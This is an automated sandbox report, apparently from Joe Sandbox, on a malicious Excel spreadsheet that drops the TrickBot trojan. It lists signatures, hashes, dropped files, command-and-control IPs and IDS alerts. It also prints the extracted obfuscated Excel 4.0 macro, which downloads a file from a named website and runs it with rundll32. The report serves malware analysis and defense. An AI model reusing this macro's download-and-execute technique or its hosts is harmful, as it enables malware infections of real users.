Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls) |
Analysis ID: | 355601 |
MD5: | a7466c0502a35e0bb2e2d4dd939a57c2 |
SHA1: | 3d17487de5287ddb252e768753487c17204358db |
SHA256: | 7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Code function: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Binary contains paths to debug symbols |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | File created: | Jump to dropped file | ||
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes |
Source: | Memory allocated: |
Writes to foreign memory regions |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Binary or memory string: | ||
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot |
Source: | File source: | ||
Remote Access Functionality: |
---|
Yara detected Trickbot |
Source: | File source: | ||
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Security Software Discovery12 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | System Network Configuration Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | System Information Discovery113 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Virustotal | Browse | ||
24% | ReversingLabs | Document-Word.Downloader.EncDoc |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false | | unknown |
www.chipmania.it | unknown | unknown | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
108.170.20.75 | unknown | United States | 20454 | SSASN2US | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
185.163.45.138 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | true | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355601 |
Start date: | 20.02.2021 |
Start time: | 02:12:46 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.29665 (renamed file extension from 29665 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/7@1/4 |
EGA Information: | Failed |
HDC Information: |
HCA Information: | Failed |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:13:41 | API Interceptor | |
02:13:41 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
108.170.20.75 | Get hash | malicious | Browse | ||
185.81.0.78 | Get hash | malicious | Browse | ||
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RedesyTelecomunicacionesHN | Get hash | malicious | Browse | ||
SSASN2US | Get hash | malicious | Browse | ||
SERVERPLAN-ASIT | Get hash | malicious | Browse | ||
MIVOCLOUDMD | Get hash | malicious | Browse | ||
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | Get hash | malicious | Browse | ||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
Joe Sandbox View: |
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660506462967762 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXt:YEGSzx0dmxk7RbsYsKtseoXd |
MD5: | 9C33B6088AC530FC55B5C91C5BF56B24 |
SHA1: | B2B3832E3F1C394090D77A78C619BD931D27BBD4 |
SHA-256: | 5DAB9606C84F490C38FC34D53BB6667A69700A2909DC9E4A8F27446D163B2186 |
SHA-512: | 2F2B0B0194DBBA468F44688552268DC9E71194C49EA529436743F5B701226D2073D642A1C269E5859C03E526D9C8A361FCB0A8A4E44D1A3A4523FB9D62CC03EB |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48260877454188 |
Encrypted: | false |
SSDEEP: | 12:85QkrwbLgXg/XAlCPCHaXgzB8IB/W9bXX+WnicvbRbDtZ3YilMMEpxRljK5TdJP8:85A/XTwz6IMXYeBDv3qYrNru/ |
MD5: | 480CFEC8F8DDD2143C63FCE36EAB4884 |
SHA1: | 35462E5DB9987DDCD2455E235CF1AAB71E606D3E |
SHA-256: | 167284DFF18BBF782FB08B875ED3B58D3CECD623EBCE3D09578182E0E7D064A8 |
SHA-512: | 74D725057DAD84C8A73E7F1D13E4014276282E1AEDCACC88733C238DE487423A7CAE86F5A8D3627AC5549921B7DDA70B58CF68D978E20BE667FD279B8184F35D |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.586134719124884 |
Encrypted: | false |
SSDEEP: | 48:8z/XT3I4HCo6z3HCsYQh2z/XT3I4HCo6z3HCsYQ/:8z/XLI4i9SsYQh2z/XLI4i9SsYQ/ |
MD5: | 71449C753C4394E2CE8EC56396C9D374 |
SHA1: | 6500F65366143261861A8BD53014BC4097DE9D36 |
SHA-256: | 454AFE73F1A3CCFCED61883249958A02C76CEBAA5E88B02492536EA5CC9C7F0C |
SHA-512: | 9487DEDA77FC7519A7B0003BE14D45538E1D0CC8A6F254A243312249E065B66274E75F5FD0C266616C1326C011B1282B74BD64B532EC03B371AECEF42E36B8B8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.821642993109982 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW4pUYCuscbcsoMW4pUYCmM0bcsoMW4pUYCv:dj60wsoMW4pB7wsoMW4pBU0wsoMW4pBs |
MD5: | 9628A5AE06F9F114CD0F0936574FC298 |
SHA1: | DC6E51926B6C3A0E430A6445829BAF71A40BA70E |
SHA-256: | FF2B7A112579AA7355A6FED4232A96EDFE20D476990345439F9018F82610C579 |
SHA-512: | 1AF06F35C0DC980EFC3782CE5BB291ED514DEE47575BFB928634D0A7298A34827A90F127586B10FC5E12D0D2C458640B158985C797D14F89F9617BF5C6A804DD |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
Joe Sandbox View: |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239935410150908 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnK:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK+ |
MD5: | 83B5D499E61F3F8F3E1708ABF03B6CB7 |
SHA1: | 9C292FA6A43FD590DDF439F4F428373DC35140AD |
SHA-256: | 2BF840715B397082E7D4C54245150284AFCC51454505EE611443EA442CA16DBD |
SHA-512: | 0647AE5F663F31EB162F7ECBE1AC8D8E127240E314D316C79C12CE936DE5793B90DF1C857866AF26B9D6EC79FFFC37853A1D40CEA3E6F87C6BBA07A6FF173B4D |
Malicious: | false |
Reputation: | low |
Preview: |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195172018000313 |
TrID: |
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls |
File size: | 168960 |
MD5: | a7466c0502a35e0bb2e2d4dd939a57c2 |
SHA1: | 3d17487de5287ddb252e768753487c17204358db |
SHA256: | 7223ea0365af06d9e25b51636aec301aa8ab84682427b6a0eacfbfb20befccda |
SHA512: | 1a0e7b272e6c3516489433a1ac429f33112d3c016e26bfc56d7a5c496939003367341f20548f1bc6667691337ed3ded0d6102fd162c9ca184e5864ef8a9f6cad |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0 |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.351244264199 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.253278926706 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-02:13:47.184877 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49166 | 443 | 192.168.2.22 | 108.170.20.75 |
02/20/21-02:14:30.920602 | TCP | 2404314 | ET CNC Feodo Tracker Reported CnC Server TCP group 8 | 49168 | 443 | 192.168.2.22 | 185.163.45.138 |
02/20/21-02:14:38.003411 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49170 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-02:15:44.697686 | TCP | 2404316 | ET CNC Feodo Tracker Reported CnC Server TCP group 9 | 49171 | 443 | 192.168.2.22 | 186.137.85.76 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 02:13:35.976202965 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 02:13:36.025083065 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 02:13:35.976202965 CET | 192.168.2.22 | 8.8.8.8 | 0x315e | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 02:13:36.025083065 CET | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 02:13:36.025083065 CET | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 02:13:36.105571985 CET | 0 | OUT | |
Feb 20, 2021 02:13:36.173185110 CET | 2 | IN |